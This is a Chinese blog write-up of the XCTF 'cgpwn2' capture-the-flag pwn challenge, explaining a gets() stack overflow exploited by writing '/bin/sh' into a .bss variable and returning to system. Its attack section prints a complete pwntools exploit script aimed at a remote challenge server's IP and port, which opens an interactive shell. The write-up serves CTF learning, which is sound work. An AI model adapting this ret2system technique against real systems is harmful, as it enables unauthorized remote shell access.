pwn之cgpwn2

最新推荐文章于 2024-07-12 10:31:01 发布
最新推荐文章于 2024-07-12 10:31:01 发布
阅读量743 收藏 1
点赞数
分类专栏: PWN题解 文章标签: pwn 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43430261/article/details/102684035
版权

0x01寻找漏洞

checksec

在这里插入图片描述

ida分析

在这里插入图片描述
进入hello()函数
在这里插入图片描述
get()函数存在栈溢出
在这里插入图片描述

  • name在bss段中,地址固定不变
  • 可以利用fgets函数向其中写东西
  • 程序中调用了system函数,但是没有/bin/sh

0x02分析利用

通过栈溢出漏洞,调用system函数,同时在name中写入“/bin/sh”,把参数地址设置为name的首地址,就可以getshell了

0x03攻击

#!usr/bin/python
from pwn import *

io = remote("111.198.29.45",37884)
# io = process("./cgpwn2")

context.log_level = 'debug'

sys_addr = 0x08048420

io.recvuntil("your name")
io.sendline("/bin/sh")

bin_sh_addr = 0x0804A080

io.recvuntil("leave some message here:")
payload  = "a" * 0x26 + "aaaa" + p32(sys_addr) + "aaaa" + p32(bin_sh_addr)


io.sendline(payload)

io.interactive()
GitCloud
关注
专栏目录
攻防世界 when_did_you_born
09-28 258
1.题目 2.IDA反汇编C程序 3.程序流程分析 首先输入Birth,如果Birth==1926直接退出;否则,输入Name,这时,判断Birth是否==1926.等于则get flag。 很明显,输入名字就是专门为我们提供溢出点的。两个变量的位置如下图: 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo
攻防世界pwn-cgpwn2
a_silly_coder的博客
01-15 1451
下载文件后,首先检查保护: 随后将文件拖入ida,查看源码,在hello函数中,发现了如下代码 首先用安全的fgets输入了一个变量,接着用不安全的gets接收了一个变量,在此处可以确认是栈溢出,且溢出点就在此处。 开始寻找利用方式,发现了system函数 还缺一个"/bin/sh"字符串,找遍了代码,没有发现,但是由于此前可以有一个自己的输入,保存在name变量上,即可以自己手动输入"/bin/sh",自此,设计栈结构为: 开始编写脚本: from pwn imp...
攻防世界_pwn_cgpwn2(萌新版)
TedLau的博客
02-24 386
首发于鄙人博客:传送门 0x00 前言 省略file checksec,此两步大家都能够实现。 0x10 步骤 0x10 hello函数 为32位文件,用32位ida打开后,可以发现如下hello函数 在hello函数中我们可以发现,他让我们输入两块内容,一个是name,一个是some message。 0x11 _system函数 而在左侧的函数栏中,我们可...
攻防世界 cgpwn2
最新发布
weixin_73399382的博客
07-12 1060
看到这fgets读取我们的输入到name中,因为程序没留shell,我们可以直接传入/bin/sh这个系统的默认shell,又因为下面使用gets从s中读取,我们可以使用让s溢出返回我们在name里面传入的默认/bin/sh。下面这个是利用plt查找system在got表中的地址,以后程序开启地址随机化的话函数的地址是变化的,就需要这么来找。s的内存空间+0处start到s需0x26字符,r是偏移指针到start处需0x4字符。system函数的地址我们刚才已经找到了,可以直接写脚本了。
攻防世界pwn——cgpwn2
qq_62076255的博客
11-05 334
攻防世界pwn——cgpwn2
PWN做题笔记5-cgpwn2(已修订)
qq_40923256的博客
04-19 227
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1 32位ELF文件 未开启ALSR 程序实现依次进行两次输入 ida反汇编,main函数无注入点,hello函数第二次输入无边界检查,可以溢出 由于pwn方法包含了system方法,因此属于ret2libc漏洞 又由于未提供/bin/sh字符串,需要通过向.bss存储的...
[攻防世界]cgpwn2
逆向萌新的博客
06-11 394
[攻防世界]cgpw2n
攻防世界pwn新手练习(cgpwn2
BurYiA的博客
03-26 525
题目链接 分析 我们来看这道题,首先checksec并运行一下 可以看到是32位程序,有两个输入点,保护只有 NX。 接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西 这就是程序给我们的两个输入点,可以看到第二个是 gets ,那就很方便了,直接溢出利用就行,翻看其他函数我们可以发现有一个system函数 很遗憾的是只有system函数而没有我们需要的shellco...
攻防世界PWN新手练习区——cgpwn2
smsyz2019的博客
09-23 314
攻防世界PWN新手练习区——cgpwn2 首先检查文件的有哪些保护 checksec cgpwn2 32位程序 用IDA反编译文件 main函数中只有hello函数,点击查看
0x00 cg_pwn2【XCTF攻防世界pwn系列writeup】
weixin_36711901的博客
11-20 468
目录一、基本情况分析:二、构造payload:三、EXP:合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 一、基本情况分析: 首先对可执行文件进行基本检查: 如图所示,该文件为32位i386的ELF可执行文件,只开启了NX,RELRO(部分
cgpwn2(xctf)
weixin_43868725的博客
05-06 373
0x0 程序保护和流程 保护: 流程: main() hello() 可以发现在hello()中存在栈溢出。 0x1 利用过程 在函数窗口中发现了system()函数,所以我们只需要字符串"/bin/sh"。就可以getshell了。仔细观察程序可以发现name变量是全局变量存放在.bss段中。 所以我们只需要向name中输入"/bin/sh",s=‘a’*(0x26+4)+p32(sys...
攻防世界-cgpwn2
qq_45771413的博客
04-23 279
查看保护 无栈保护,无PIE保护 IDA 两次输入,一个输入名字(限制了输入长度),一个输入信息(gets可以作栈溢出) 解题思路 shift+f12查找字符串并没有发现/bin/sh,可能需要自己整,或者藏在某个变量里 在找_system函数的过程中,发现了pwn命名的函数,进入发现有system调用,第一次做的时候看到system就乐了,直接溢出s,然后跳转到pwn地址,结果真就只有 hehehe …… 估计这是出题人的恶趣味…… 后来我在函数列表里找到了真正的_system,括号内的comma
攻防世界cgpwn2
zyh18851473527的博客
08-05 889
首先checksec,之后放入IDA中 点进hello 发现gets()函数可能会存在栈溢出,然后我们点进name 发现 name 地址是固定的,那我们可以它写入 bin/sh ,接着看能不能找到system 找到啦!所以这个题目的思路是:通过栈溢出漏洞,调用system函数,同时在name中写入"/bin/sh",把参数地址设置为name的首地址,就可以getshell了! gets() ...
攻防世界PWN-cgpwn2
Deeeelete的博客
11-14 368
题目:cgpwn2 拖进PE查看一下 32位程序 checksec查看 简单执行一下 开32位IDA f5反编译main函数 main函数中直接就是输出了,输入的内容好像藏在了hello方法里 双击进去查看 单独拿出源码 char *hello() { char *v0; // eax@1 signed int v1; // ebx@1 unsigned int v2; // ecx@3 char *v3; // eax@5 char s; // [sp+12
攻防世界 - pwn - cgpwn2
qq726232111的博客
03-16 223
A、流程分析 1、将输入的用户名存储到全局变量 2、通过gets()获取留言信息 B、利用分析 1、gets( ebp-26h ) -> 26h(填充数据) + 4(ebp) + 4(返回地址) -> payload构造 2、可利用函数 在pwn函数有system函数,可通过该地址调用系统命令 3、用户名使用的全局变...
cgpwn2 [XCTF-PWN]CTF writeup系列10
重新启程
12-20 537
题目地址:cgpwn2 先看看题目内容: 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 330890cb0975439295262dd46dac13b9 [*] '/ctf/work/python/330890cb0975439295262dd46dac13b9' Arch: i386-32-little R...
ctfshow的pwn2
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值